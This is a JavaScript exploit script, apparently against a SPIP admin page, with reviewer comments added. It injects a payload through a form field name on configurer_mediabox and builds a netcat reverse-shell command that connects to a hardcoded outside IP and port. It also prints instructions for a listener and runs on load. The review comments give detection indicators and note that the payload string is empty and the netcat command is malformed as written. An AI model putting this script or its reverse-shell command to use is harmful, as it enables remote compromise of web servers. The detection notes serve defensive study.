// --- Configuration ---
// IMPORTANT: Replace these values with your own IP and port.
// NOTE(review): every fetch() below uses a path-relative URL, so the script is meant to
// run inside a browser tab that is already on the target site; cookies for that origin
// are sent implicitly. The `/ecrire/?exec=...` path presumably is a SPIP back office —
// confirm against the target, nothing here names the product.
const ATTACKER_IP = '161.97.146.1'; // e.g., '192.168.1.10'
const ATTACKER_PORT = '4444'; // e.g., '4444'
// ---------------------

// Loads the configurer_mediabox page, re-submits its form with one extra field, and
// returns nothing. The payload travels in the field NAME, not its value: the field is
// `lity[BEFORE<payload>AFTER]` with the constant value 42.
// Detection: a POST to `/ecrire/?exec=configurer_mediabox` whose body contains a
// parameter name starting with `lity[BEFORE` is a high-fidelity indicator of this
// script; a legitimate submission of that form carries no such key.
// Errors are logged and swallowed, so callers cannot tell whether the POST happened.
async function implant_rce(payload) {
  // This function remains the same. It injects the payload.
  const url = '/ecrire/?exec=configurer_mediabox';
  try {
    // GET the page first so the real form (including any hidden/CSRF-style fields it
    // carries) can be replayed as-is; the injected key is appended on top of it.
    const htmlContent = await (await fetch(url)).text();
    const parser = new DOMParser();
    const doc = parser.parseFromString(htmlContent, 'text/html');
    const form = doc.querySelector('form[action="/ecrire/?exec=configurer_mediabox"]');
    // FormData(form) throws if querySelector returned null; that lands in the catch below.
    const formData = new FormData(form);
    formData.append(`lity[BEFORE${payload}AFTER]`, 42);
    // Response is never inspected; `submitResponse` is unused.
    const submitResponse = await fetch(form.action, { method: 'POST', body: formData, });
  } catch (error) {
    console.error("Error during implant:", error);
  }
}

// Re-fetches the same page and looks for the BEFORE...AFTER markers in the HTML.
// Returns one of two fixed strings. A match only shows the marker text was echoed back
// by the server; it is not evidence that anything was executed server-side.
// Detection: two GETs of configurer_mediabox bracketing the POST above, all from the
// same session within seconds, is the request pattern this script produces.
async function trigger_rce() {
  // This function is no longer needed to get output for a reverse shell,
  // but we keep it to maintain the script's logic flow.
  const url = `/ecrire/?exec=configurer_mediabox`;
  const htmlContent = await (await fetch(url)).text();
  // Non-greedy, whitespace-tolerant capture of whatever sits between the two markers.
  const regex = /BEFORE\s*([\s\S]*?)\s*AFTER/;
  const match = htmlContent.match(regex);
  // The result of a reverse shell is not captured here; it's an interactive session.
  // We can return a confirmation message instead.
  return match ? "Payload triggered." : "Payload not found in response.";
}

// Sequences implant_rce() then trigger_rce() and returns trigger_rce()'s string.
// Because implant_rce() swallows its errors, trigger_rce() runs even when the POST failed.
async function rce(cmd_payload) {
  // The core change is here. We now pass the full netcat payload.
  await implant_rce(cmd_payload);
  let result = await trigger_rce();
  return result;
}

// Builds the command string, base64-encodes it, and hands `php_payload` to rce().
// As written on this page `php_payload` is the empty string and `encoded_payload` is
// never read, so what is actually submitted is the field name `lity[BEFOREAFTER]`.
// Host-side indicators if a command of this shape ever does run: a FIFO at `/tmp/f`,
// `nc` and `tee` processes parented by the web-server/PHP worker, and an outbound TCP
// connection from that host to ATTACKER_IP:ATTACKER_PORT. Egress filtering from web
// tier hosts and alerting on shell children of PHP workers both break this step.
async function get_reverse_shell() {
  // --- Step 1: Create the Netcat Payload ---
  // This payload uses `mkfifo` to create a named pipe, allowing for a stable, two-way connection.
  // It then uses `/bin/sh -i` to launch an interactive shell.
  // The command is base64 encoded to avoid issues with special characters.
  const netcat_command = `mkfifo /tmp/f; nc ${ATTACKER_IP} ${ATTACKER_PORT} 0&1 | tee /tmp/f`;
  const encoded_payload = btoa(netcat_command);
  const php_payload = ``;
  console.log("Attempting to establish reverse shell...");
  console.log(`Make sure you are listening on your machine with: nc -lvnp ${ATTACKER_PORT}`);
  // --- Step 2: Execute the Payload ---
  const result = await rce(php_payload);
  console.log("Payload sent. Result:", result);
  // --- Step 3: Clean Up (Optional but Recommended) ---
  // After you disconnect from the shell, you can run this to remove the backdoor.
  // You might want to call this separately after your session is over.
  // NOTE(review): the "clean up" below would be another implant_rce() call with a
  // different marker payload, i.e. another POST with a `lity[BEFORE...AFTER]` key —
  // the same detection rule as the implant covers it.
  // await implant_rce("whiped");
}

// --- Execute the function to get the shell ---
// Make sure to set your IP and port in the configuration above before running!
// Runs unconditionally on load; the returned promise is not awaited or caught, so a
// rejection surfaces only as an unhandled-rejection message in the browser console.
get_reverse_shell();